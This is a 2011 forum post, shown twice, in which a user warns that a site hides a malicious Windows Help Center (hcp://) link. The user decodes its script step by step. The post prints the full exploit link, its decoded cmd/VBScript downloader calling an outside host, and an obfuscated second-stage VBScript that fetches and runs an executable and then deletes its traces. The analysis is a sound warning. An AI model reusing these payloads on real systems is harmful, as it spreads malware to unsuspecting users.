Raging Fury - View Single Post

Naedion · 04-11-2011, 09:06

hm you sure this is a trustable site?

the site contains a script hidden in a link
========================
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A. .%5C..%5Csysinfomain.htm?svr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,4 7,99,32,101,99,104,111,32,66,61,34,108,46,118,98,1 15,34,58,87,105,116,104,32,67,114,101,97,116,101,7 9,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88, 77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,3 4,71,69,84,34,44,34,104,116,116,112,58,47,47,114,9 7,102,116,111,122,97,46,99,111,109,47,99,111,110,1 16,101,110,116,47,104,99,112,95,118,98,115,46,112, 104,112,63,102,61,51,54,38,100,61,48,34,44,102,97, 108,115,101,58,46,115,101,110,100,40,41,58,83,101, 116,32,65,32,61,32,67,114,101,97,116,101,79,98,106 ,101,99,116,40,34,83,99,114,105,112,116,105,110,10 3,46,70,105,108,101,83,121,115,116,101,109,79,98,1 06,101,99,116,34,41,58,83,101,116,32,68,61,65,46,6 7,114,101,97,116,101,84,101,120,116,70,105,108,101 ,40,65,46,71,101,116,83,112,101,99,105,97,108,70,1 11,108,100,101,114,40,50,41,32,43,32,34,92,34,32,4 3,32,66,41,58,68,46,87,114,105,116,101,76,105,110, 101,32,46,114,101,115,112,111,110,115,101,84,101,1 20,116,58,69,110,100,32,87,105,116,104,58,68,46,67 ,108,111,115,101,58,67,114,101,97,116,101,79,98,10 6,101,99,116,40,34,87,83,99,114,105,112,116,46,83, 104,101,108,108,34,41,46,82,117,110,32,65,46,71,10 1,116,83,112,101,99,105,97,108,70,111,108,100,101, 114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,3 2,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38, 38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32 ,38,38,32,116,97,115,107,107,105,108,108,32,47,70, 32,47,73,77,32,104,101,108,112,99,116,114,46,101,1 20,101)));</script>
========================

the colored part translated:

========================
cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://raftoza.com/content/hcp_vbs.php?f=36&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe
========================

execute a vbs script, start the command shell, get code from
a website then execute the downloaded script

the code from the website http:// raftoza.com / content / hcp_vbs. php ?f=36 &d=0

========================
w=3000:x=200:y=1:z=false:a = "http://raftoza.com/w.php?e=7&f=36":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpirc S")):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02-16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpi rcS")) On Error resume next c.open OT, a, z:c.send() If c.Status = x Then d.Open:d.Type = y:d.Write c.ResponseBody:d.SaveToFile b:d.Close End If Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW")) Eval(Replace("W.ex2c b", Month("2010-02-16"), "E")) W.eXeC "taskkill /F /IM wmplayer.exe":W.eXeC "taskkill /F /IM realplay.exe":Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("bv.l") & "s"):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):g.Delete
========================

this code connects again to the webserver and downloads an .exe file for example contact.ext, readme.exe ...

04-11-2011, 09:06	#2
Naedion r3d 3vil w3zurd Join Date: May 2006 Posts: 679	Re: <3 this site hm you sure this is a trustable site? the site contains a script hidden in a link ======================== hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A. .%5C..%5Csysinfomain.htm?svr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,4 7,99,32,101,99,104,111,32,66,61,34,108,46,118,98,1 15,34,58,87,105,116,104,32,67,114,101,97,116,101,7 9,98,106,101,99,116,40,34,77,83,88,77,76,50,46,88, 77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,3 4,71,69,84,34,44,34,104,116,116,112,58,47,47,114,9 7,102,116,111,122,97,46,99,111,109,47,99,111,110,1 16,101,110,116,47,104,99,112,95,118,98,115,46,112, 104,112,63,102,61,51,54,38,100,61,48,34,44,102,97, 108,115,101,58,46,115,101,110,100,40,41,58,83,101, 116,32,65,32,61,32,67,114,101,97,116,101,79,98,106 ,101,99,116,40,34,83,99,114,105,112,116,105,110,10 3,46,70,105,108,101,83,121,115,116,101,109,79,98,1 06,101,99,116,34,41,58,83,101,116,32,68,61,65,46,6 7,114,101,97,116,101,84,101,120,116,70,105,108,101 ,40,65,46,71,101,116,83,112,101,99,105,97,108,70,1 11,108,100,101,114,40,50,41,32,43,32,34,92,34,32,4 3,32,66,41,58,68,46,87,114,105,116,101,76,105,110, 101,32,46,114,101,115,112,111,110,115,101,84,101,1 20,116,58,69,110,100,32,87,105,116,104,58,68,46,67 ,108,111,115,101,58,67,114,101,97,116,101,79,98,10 6,101,99,116,40,34,87,83,99,114,105,112,116,46,83, 104,101,108,108,34,41,46,82,117,110,32,65,46,71,10 1,116,83,112,101,99,105,97,108,70,111,108,100,101, 114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,3 2,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38, 38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32 ,38,38,32,116,97,115,107,107,105,108,108,32,47,70, 32,47,73,77,32,104,101,108,112,99,116,114,46,101,1 20,101)));</script> ======================== the colored part translated: ======================== cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://raftoza.com/content/hcp_vbs.php?f=36&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe ======================== execute a vbs script, start the command shell, get code from a website then execute the downloaded script the code from the website http:// raftoza.com / content / hcp_vbs. php ?f=36 &d=0 ======================== w=3000:x=200:y=1:z=false:a = "http://raftoza.com/w.php?e=7&f=36":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpirc S")):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02-16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpi rcS")) On Error resume next c.open OT, a, z:c.send() If c.Status = x Then d.Open:d.Type = y:d.Write c.ResponseBody:d.SaveToFile b:d.Close End If Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW")) Eval(Replace("W.ex2c b", Month("2010-02-16"), "E")) W.eXeC "taskkill /F /IM wmplayer.exe":W.eXeC "taskkill /F /IM realplay.exe":Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("bv.l") & "s"):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):g.Delete ======================== this code connects again to the webserver and downloads an .exe file for example contact.ext, readme.exe ... Last edited by Naedion; 04-11-2011 at 09:24.